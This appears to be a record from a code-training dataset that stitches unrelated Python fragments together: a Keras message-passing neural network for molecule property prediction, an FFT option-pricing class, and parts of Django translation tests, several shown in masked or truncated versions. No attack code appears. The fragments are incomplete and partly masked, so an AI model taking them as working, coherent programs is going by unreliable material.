def __len__(self):\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\ndef update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],\n num_epochs: int, atom_types: List[int], bond_types: List[str],\n batch_size: int=512, validation_split: float=0.1, random_state: int=1,\n learning_rate: float=0.001) ->Tuple[List, dict]:\n \"\"\"Update a model with new training sets\n\n Args:\n model_msg: Serialized version of the model\n database: Training dataset of molecule mapped to a property\n atom_types: List of known atom types\n bond_types: List of known bond types\n num_epochs: Number of epochs to run\n 
batch_size: Number of molecules per training batch\n validation_split: Fraction of molecules used for the training/validation split\n random_state: Seed to the random number generator. Ensures entries do not move between train\n and validation set as the database becomes larger\n learning_rate: Learning rate for the Adam optimizer\n Returns:\n model: Updated weights\n history: Training history\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n model.compile(tf.keras.optimizers.Adam(lr=learning_rate),\n 'mean_absolute_error')\n smiles, y = zip(*database.items())\n rng = np.random.RandomState(random_state)\n train_split = rng.rand(len(smiles)) > validation_split\n smiles = np.array(smiles)\n y = np.array(y)\n train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,\n y[train_split], batch_size=batch_size)\n val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,\n y[~train_split], batch_size=batch_size, shuffle=False)\n history = model.fit(train_loader, epochs=num_epochs, validation_data=\n val_loader, verbose=False)\n return [np.array(v) for v in model.get_weights()], history.history\n",
"step-4": "<mask token>\nfrom typing import List, Dict, Tuple\nimport numpy as np\nimport tensorflow as tf\nfrom molgym.mpnn.data import convert_nx_to_dict\nfrom molgym.mpnn.layers import custom_objects\nfrom molgym.utils.conversions import convert_smiles_to_nx\n\n\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n self.config = model.to_json()\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) ->tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects\n =custom_objects)\n model.set_weights(self.weights)\n return model\n\n\ndef _merge_batch(mols: List[dict]) ->dict:\n \"\"\"Merge a list of molecules into a single batch\n\n Args:\n mols: List of molecules in dictionary format\n Returns:\n Single batch of molecules\n \"\"\"\n batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],\n axis=0)) for k in mols[0].keys())\n batch_size = len(mols)\n mol_id = np.arange(batch_size, dtype=np.int)\n batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)\n batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)\n offset_values = np.zeros(batch_size, dtype=np.int)\n np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])\n offsets = np.repeat(offset_values, batch['n_bond'], axis=0)\n batch['connectivity'] += np.expand_dims(offsets, 1)\n return batch\n\n\ndef evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str], atom_types:\n List[int], bond_types: List[str], batch_size: int=128) ->np.ndarray:\n \"\"\"Run inference on a list of molecules\n\n Args:\n model_msg: Serialized version of the model\n smiles: List of molecules to evaluate\n atom_types: List of known atom types\n bond_types: List of known bond types\n batch_size: List of molecules to create into matches\n Returns:\n Predicted value for each molecule\n \"\"\"\n 
tf.keras.backend.clear_session()\n model = model_msg.get_model()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n chunks = [mols[start:start + batch_size] for start in range(0, len(mols\n ), batch_size)]\n batches = [_merge_batch(c) for c in chunks]\n outputs = [model.predict_on_batch(b) for b in batches]\n return np.vstack(outputs)\n\n\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types:\n List[str], outputs: List[float], batch_size: int, shuffle: bool=\n True, random_state: int=None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n super(GraphLoader, self).__init__()\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,\n bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\ndef update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],\n num_epochs: int, atom_types: List[int], bond_types: List[str],\n batch_size: int=512, validation_split: float=0.1, random_state: int=1,\n learning_rate: float=0.001) ->Tuple[List, dict]:\n \"\"\"Update a model with 
new training sets\n\n Args:\n model_msg: Serialized version of the model\n database: Training dataset of molecule mapped to a property\n atom_types: List of known atom types\n bond_types: List of known bond types\n num_epochs: Number of epochs to run\n batch_size: Number of molecules per training batch\n validation_split: Fraction of molecules used for the training/validation split\n random_state: Seed to the random number generator. Ensures entries do not move between train\n and validation set as the database becomes larger\n learning_rate: Learning rate for the Adam optimizer\n Returns:\n model: Updated weights\n history: Training history\n \"\"\"\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n model.compile(tf.keras.optimizers.Adam(lr=learning_rate),\n 'mean_absolute_error')\n smiles, y = zip(*database.items())\n rng = np.random.RandomState(random_state)\n train_split = rng.rand(len(smiles)) > validation_split\n smiles = np.array(smiles)\n y = np.array(y)\n train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,\n y[train_split], batch_size=batch_size)\n val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,\n y[~train_split], batch_size=batch_size, shuffle=False)\n history = model.fit(train_loader, epochs=num_epochs, validation_data=\n val_loader, verbose=False)\n return [np.array(v) for v in model.get_weights()], history.history\n",
"step-5": "\"\"\"Functions for updating and performing bulk inference using an Keras MPNN model\"\"\"\nfrom typing import List, Dict, Tuple\n\nimport numpy as np\nimport tensorflow as tf\nfrom molgym.mpnn.data import convert_nx_to_dict\nfrom molgym.mpnn.layers import custom_objects\nfrom molgym.utils.conversions import convert_smiles_to_nx\n\n\n# TODO (wardlt): Make this Keras message object usable elsewhere\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n\n self.config = model.to_json()\n # Makes a copy of the weights to ensure they are not memoryview objects\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) -> tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects=custom_objects)\n model.set_weights(self.weights)\n return model\n\n\ndef _merge_batch(mols: List[dict]) -> dict:\n \"\"\"Merge a list of molecules into a single batch\n\n Args:\n mols: List of molecules in dictionary format\n Returns:\n Single batch of molecules\n \"\"\"\n\n # Convert arrays to array\n\n # Stack the values from each array\n batch = dict(\n (k, np.concatenate([np.atleast_1d(m[k]) for m in mols], axis=0))\n for k in mols[0].keys()\n )\n\n # Compute the mappings from bond index to graph index\n batch_size = len(mols)\n mol_id = np.arange(batch_size, dtype=np.int)\n batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)\n batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)\n\n # Compute offsets for the connectivity matrix\n offset_values = np.zeros(batch_size, dtype=np.int)\n np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])\n offsets = np.repeat(offset_values, batch['n_bond'], axis=0)\n batch['connectivity'] += np.expand_dims(offsets, 1)\n\n return batch\n\n\ndef evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str],\n atom_types: List[int], 
bond_types: List[str], batch_size: int = 128) -> np.ndarray:\n \"\"\"Run inference on a list of molecules\n\n Args:\n model_msg: Serialized version of the model\n smiles: List of molecules to evaluate\n atom_types: List of known atom types\n bond_types: List of known bond types\n batch_size: List of molecules to create into matches\n Returns:\n Predicted value for each molecule\n \"\"\"\n\n # Rebuild the model\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n\n # Convert all SMILES strings to batches of molecules\n # TODO (wardlt): Use multiprocessing. Could benefit from a persistent Pool to avoid loading in TF many times\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types, bond_types) for s in smiles]\n chunks = [mols[start:start + batch_size] for start in range(0, len(mols), batch_size)]\n batches = [_merge_batch(c) for c in chunks]\n\n # Feed the batches through the MPNN\n outputs = [model.predict_on_batch(b) for b in batches]\n return np.vstack(outputs)\n\n\n# TODO (wardlt): Move to the MPNN library?\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types: List[str],\n outputs: List[float], batch_size: int, shuffle: bool = True, random_state: int = None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n\n super(GraphLoader, self).__init__()\n\n # Convert the molecules to MPNN-ready formats\n mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types, bond_types) for s in smiles]\n self.entries = np.array(list(zip(mols, outputs)))\n\n # Other data\n self.batch_size = batch_size\n self.shuffle = shuffle\n\n # Give it a first 
shuffle, if needed\n self.rng = np.random.RandomState(random_state)\n if shuffle:\n self.rng.shuffle(self.entries)\n\n def __getitem__(self, item):\n # Get the desired chunk of entries\n start = item * self.batch_size\n chunk = self.entries[start:start + self.batch_size]\n\n # Get the molecules and outputs out\n mols, y = zip(*chunk)\n x = _merge_batch(mols)\n return x, np.array(y)\n\n def __len__(self):\n # Get the number of batches\n train_size = len(self.entries)\n n_batches = train_size // self.batch_size\n\n # Add a partially-full batch at the end\n if train_size % self.batch_size != 0:\n n_batches += 1\n return n_batches\n\n\n# TODO (wardlt): Evaluate whether the model stays in memory after training. If so, clear graph?\ndef update_mpnn(model_msg: MPNNMessage, database: Dict[str, float], num_epochs: int,\n atom_types: List[int], bond_types: List[str], batch_size: int = 512,\n validation_split: float = 0.1, random_state: int = 1, learning_rate: float = 1e-3)\\\n -> Tuple[List, dict]:\n \"\"\"Update a model with new training sets\n\n Args:\n model_msg: Serialized version of the model\n database: Training dataset of molecule mapped to a property\n atom_types: List of known atom types\n bond_types: List of known bond types\n num_epochs: Number of epochs to run\n batch_size: Number of molecules per training batch\n validation_split: Fraction of molecules used for the training/validation split\n random_state: Seed to the random number generator. 
Ensures entries do not move between train\n and validation set as the database becomes larger\n learning_rate: Learning rate for the Adam optimizer\n Returns:\n model: Updated weights\n history: Training history\n \"\"\"\n\n # Rebuild the model\n tf.keras.backend.clear_session()\n model = model_msg.get_model()\n model.compile(tf.keras.optimizers.Adam(lr=learning_rate), 'mean_absolute_error')\n\n # Separate the database into molecules and properties\n smiles, y = zip(*database.items())\n\n # Make the training and validation splits\n # Use a random number generator with fixed seed to ensure that the validation\n # set is never polluted with entries from the training set\n # TODO (wardlt): Replace with passing train and validation separately?\n rng = np.random.RandomState(random_state)\n train_split = rng.rand(len(smiles)) > validation_split\n\n # Make the loaders\n smiles = np.array(smiles)\n y = np.array(y)\n train_loader = GraphLoader(smiles[train_split], atom_types, bond_types, y[train_split],\n batch_size=batch_size)\n val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types, y[~train_split],\n batch_size=batch_size, shuffle=False)\n\n # Run the desired number of epochs\n # TODO (wardlt): Should we use callbacks to get only the \"best model\" based on the validation set?\n history = model.fit(train_loader, epochs=num_epochs, validation_data=val_loader, verbose=False)\n return [np.array(v) for v in model.get_weights()], history.history\n",
"step-ids": [
9,
11,
12,
13,
14
]
}
|
[
9,
11,
12,
13,
14
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 14 01:32:26 2019
@author: himanshu
"""
import numpy as np
from scipy.interpolate import interp1d
from option import Option
class FFTPricing:
    """Fourier-transform pricer for European options (Carr-Madan style).

    The option payoff is damped by exp(alpha * k) (k = log-strike), the
    Fourier transform of the damped, discounted price is evaluated on a
    truncated frequency grid, and the inverse transform is approximated by
    trapezoidal quadrature.  The price at the requested strike is then read
    off by linear interpolation on the resulting log-strike grid.
    """

    def __init__(self,
                 option : 'Option',
                 riskFreeRate,
                 volatility,
                 samplePoints,
                 bandwidth,
                 dampingFactor,
                 underlyingModel = 'GBM'):
        """
        Args:
            option: Contract to price; must be a European option.
            riskFreeRate: Continuously compounded risk-free rate.
            volatility: Annualized volatility of the underlying.
            samplePoints: Number of quadrature points N.
            bandwidth: Frequency-domain truncation B; spacing is B/(N-1).
            dampingFactor: Damping alpha (positive for calls, negative
                for puts).
            underlyingModel: Underlying dynamics; only 'GBM' is implemented.
        """
        self.__option = option
        self.__r = riskFreeRate
        self.__sigma = volatility
        self.__N = samplePoints
        self.__B = bandwidth
        self.__alpha = dampingFactor
        self.__model = underlyingModel

    # Characteristic function of the log-price, evaluated at the shifted
    # argument omega + i*(alpha + 1) required by the damped-payoff formula.
    def __charactersticFunc(self, omega):
        S0 = self.__option.underlyingPrice
        r = self.__r
        T = self.__option.timeToExpiry
        sigma = self.__sigma
        alpha = self.__alpha

        if self.__model == 'GBM':
            # Under GBM the log-price is Gaussian with mean mu and
            # variance 2*sig.
            x0 = np.log(S0)
            mu = x0 + ((r - (sigma**2)/2)*(T))
            sig = (sigma**2)*(T)/2
            omega_prime = omega + 1j*(alpha+1)
            return np.exp(-1j*mu*omega_prime - sig*(omega_prime**2))
        # Fixed: unsupported models (e.g. 'VG') used to fall through and
        # silently return None, which surfaced later as an opaque TypeError
        # inside __fourierTransform.  Fail fast and explicitly instead.
        raise NotImplementedError(
            "underlying model '{}' is not implemented".format(self.__model))

    # Fourier transform of the damped, discounted option price
    # (Carr-Madan denominator (alpha - i*w)(alpha - i*w + 1)).
    def __fourierTransform(self, omega):
        alpha = self.__alpha
        r = self.__r
        T = self.__option.timeToExpiry

        q_hat = self.__charactersticFunc(omega)
        num = np.exp(-r*(T))*q_hat
        den = (alpha - 1j*omega)*(alpha - (1j*omega) + 1)
        return num/den

    def optionPrice(self):
        """Return the option price rounded to two decimals.

        Prints a notice and returns 0.0 for non-European contracts.
        """
        if not self.__option.expiryType == 'European':
            print('Not a European Option')
            return 0.0

        K = self.__option.strikePrice

        N = self.__N
        B = self.__B
        alpha = self.__alpha

        h = B/(N-1)                  # frequency-grid spacing
        omega = np.arange(0,N)*h     # frequency grid on [0, B]

        dk = 2*np.pi/(h*N)           # conjugate log-strike spacing
        # NOTE(review): the log-strike grid is anchored at ln(20); strikes
        # far below 20 fall outside the interpolation range -- confirm intent.
        k = np.log(20) + np.arange(0,N)*dk

        # Trapezoidal quadrature weights (half weight at omega = 0).
        dw = np.zeros(N)
        dw[0] = h/2
        dw[1:] = h

        # The transform values do not depend on the log-strike, so compute
        # them once.  Previously this was re-evaluated inside the loop,
        # duplicating the work N times (O(N^2) transform evaluations).
        nu_hat = self.__fourierTransform(omega)

        # Inverse transform by direct quadrature at each log-strike.
        V = np.zeros(N)
        for n in range(N):
            inner_sum = np.sum(np.exp(1j*omega*k[n])*nu_hat*dw)
            V[n] = ((np.exp(-alpha*k[n])/np.pi)*inner_sum).real

        val = interp1d(k, V)
        return float('{0:.2f}'.format(val(np.log(K))))

    def __repr__(self):
        return "FFTPricing({}, {}, {}, {}, {}, {})"\
            .format(self.__option,
                    self.__r,
                    self.__sigma,
                    self.__N,
                    self.__B,
                    self.__alpha)
if __name__ == "__main__":
    from option import European

    # Demo: price an at/near-the-money call and put under identical
    # market parameters, differing only in the sign of the damping factor.
    spot = 100
    strike = 110
    rate = 0.10
    maturity = 1
    vol = 0.25

    n_points = 2**10
    bandwidth = 50
    damping = 10.0

    banner = ('------------------------------------------------------------------'
              +'----------------------------')
    messages = {'Call': 'FFT price for Call:', 'Put': 'FFT price for Put:'}

    for flavour, damp in (('Call', damping), ('Put', -damping)):
        print(banner)
        contract = European(spot, strike, maturity, flavour)
        pricer = FFTPricing(contract, rate, vol, n_points, bandwidth, damp)
        print(pricer)
        print(messages[flavour], pricer.optionPrice())
|
normal
|
{
"blob_id": "25987c15c28e3939f9f531dbc1d4bd9bf622b5a9",
"index": 5691,
"step-1": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n <mask token>\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\nif __name__ == '__main__':\n from option import European\n S0 = 100\n K = 110\n r = 0.1\n T = 1\n volatility = 0.25\n N = 2 ** 10\n B 
= 50\n alpha = 10.0\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n",
"step-4": "<mask token>\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom option import Option\n\n\nclass FFTPricing:\n\n def __init__(self, option: Option, riskFreeRate, volatility,\n samplePoints, bandwidth, dampingFactor, underlyingModel='GBM'):\n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + (r - sigma ** 2 / 2) * T\n sig = sigma ** 2 * T / 2\n omega_prime = omega + 1.0j * (alpha + 1)\n return np.exp(-1.0j * mu * omega_prime - sig * omega_prime ** 2)\n elif self.__model == 'VG':\n pass\n\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r * T) * q_hat\n den = (alpha - 1.0j * omega) * (alpha - 1.0j * omega + 1)\n return num / den\n\n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n K = self.__option.strikePrice\n N = self.__N\n B = self.__B\n alpha = self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\nif __name__ == '__main__':\n from option import 
European\n S0 = 100\n K = 110\n r = 0.1\n T = 1\n volatility = 0.25\n N = 2 ** 10\n B = 50\n alpha = 10.0\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 14 01:32:26 2019\n\n@author: himanshu\n\"\"\"\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom option import Option\n\nclass FFTPricing:\n \n def __init__(self,\n option : Option,\n riskFreeRate,\n volatility,\n samplePoints,\n bandwidth,\n dampingFactor,\n underlyingModel = 'GBM'):\n \n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n \n \n # Computes the characterstic function of a GBM.\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n \n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + ((r - (sigma**2)/2)*(T))\n sig = (sigma**2)*(T)/2\n omega_prime = omega + 1j*(alpha+1)\n return np.exp(-1j*mu*omega_prime - sig*(omega_prime**2))\n elif self.__model == 'VG':\n pass\n \n # Computes the Fourier Transform of a GBM.\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n \n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r*(T))*q_hat\n den = (alpha - 1j*omega)*(alpha - (1j*omega) + 1)\n return num/den\n \n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n \n K = self.__option.strikePrice\n \n N = self.__N\n B = self.__B\n alpha = self.__alpha\n \n h = B/(N-1)\n omega = np.arange(0,N)*h\n \n dk = 2*np.pi/(h*N)\n k = np.log(20) + np.arange(0,N)*dk\n \n dw = np.zeros(N)\n dw[0] = h/2\n dw[1:] = h\n \n # FFT Algorithm\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1j*omega*k[n])*nu_hat*dw)\n V[n] = ((np.exp(-alpha*k[n])/np.pi)*inner_sum).real\n \n val = interp1d(k, V)\n return 
float('{0:.2f}'.format(val(np.log(K))))\n \n def __repr__(self):\n \n return \"FFTPricing({}, {}, {}, {}, {}, {})\"\\\n .format(self.__option,\n self.__r,\n self.__sigma,\n self.__N,\n self.__B,\n self.__alpha)\n \nif __name__ == \"__main__\":\n from option import European\n S0 = 100\n K = 110\n r = 0.10\n T = 1\n volatility = 0.25\n \n N = 2**10\n B = 50\n alpha = 10.0\n \n print('------------------------------------------------------------------'\n +'----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n \n print('------------------------------------------------------------------'\n +'----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n ",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class CompetenceTest(TestCase):
<|reserved_special_token_0|>
def test_translation(self):
competence = Competence.objects.first()
self.assertEqual(competence.name, 'mining')
competence.set_current_language('sv')
self.assertEqual(competence.name, 'gruvarbete')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CompetenceTest(TestCase):
<|reserved_special_token_0|>
def test_translation(self):
competence = Competence.objects.first()
self.assertEqual(competence.name, 'mining')
competence.set_current_language('sv')
self.assertEqual(competence.name, 'gruvarbete')
def test_translation_fallback(self):
competence = Competence.objects.first()
competence.set_current_language('fi')
self.assertEqual(competence.name, 'mining')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CompetenceTest(TestCase):
def setUp(self):
self.competence = Competence.objects.create(name='mining')
self.competence.set_current_language('sv')
self.competence.name = 'gruvarbete'
self.competence.save()
def test_translation(self):
competence = Competence.objects.first()
self.assertEqual(competence.name, 'mining')
competence.set_current_language('sv')
self.assertEqual(competence.name, 'gruvarbete')
def test_translation_fallback(self):
competence = Competence.objects.first()
competence.set_current_language('fi')
self.assertEqual(competence.name, 'mining')
<|reserved_special_token_1|>
from django.test import TestCase
from recruitmentapp.apps.core.models import Competence
